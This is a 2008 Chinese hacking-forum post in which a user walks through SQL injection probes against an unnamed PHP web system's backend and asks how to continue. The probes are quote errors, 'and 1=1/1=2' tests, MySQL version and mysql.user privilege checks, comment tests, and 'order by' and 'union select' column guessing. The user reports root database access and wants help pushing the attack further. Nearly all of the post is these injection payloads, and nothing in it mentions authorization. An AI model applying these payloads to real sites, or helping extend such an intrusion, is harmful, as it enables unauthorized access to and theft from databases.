【3.A.S.T】网络安全爱好者 » 技术交流 » [讨论]奇怪的php注射点

2000gaobo 发表于 2008-7-22 15:22

[讨论]奇怪的php注射点

[讨论]奇怪的php注射点
议题作者：唐不狐
信息来源：邪恶八进制信息安全团队（[url=http://www.eviloctal.com/]www.eviloctal.com[/url]）

在某web系统后台检测的时候获得一个注射点，情况如下：

.php?vm=30'
报错，得到web路径 /*(窃喜ing)

.php?vm=30 and 1=1
返回正常

.php?vm=30 and 1=2
页面异常

----------------到此判断可注射----------------------------------

接下来

.php?vm=30 and ord(mid(version(),1,1))>51
返回正常,说明数据库版本大于4.0,支持union查询

.php?vm=30 and (select count(*) from mysql.user)>0
正常,嘿嘿,有权限喔.

接着用C4经典注射证实如下:mysql版本4.1.2,连接用户是root,库名也出来了


--------------------------接下来就郁闷了------------------------------------------
.php?vm=30/*buhu
返回错误,晕猪,难道不能用/*注释?
.php?vm=30#buhu
返回正常,可以用#注释

接下来常规手法猜字段长度
.php?vm=30 order by 10  

报错,日,字段小于10?其实我估算了下,字段绝对在10以上的.暂且信它,继续...

.php?vm=30 order by 5 返回错误
.php?vm=30 order by 1 返回错误
.php?vm=30 order by 0 返回错误,彻底无语 (加#注释一样)

.php?vm=30 and 1=2 union select 1,2,3...... 咱就干到110,还是报错.不可能哇
换个方式
.php?vm=30 and 1=2 union select char(97),char(97),char(97)....
依然报错
---------------------------虾米意思?--------------------------------------------------

请大大们指教! thx!
1 什么原因?
2 如何继续?
帖子145 精华[url=http://forum.eviloctal.com/digest.php?authorid=13478]2[/url] 积分574 阅读权限50 性别男 来自china 在线时间107 小时 注册时间2005-9-27 最后登录2008-7-21 [url=http://blog.wang1.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=13478]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-61132.html]wyzhack[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

查看完整版本: [讨论]奇怪的php注射点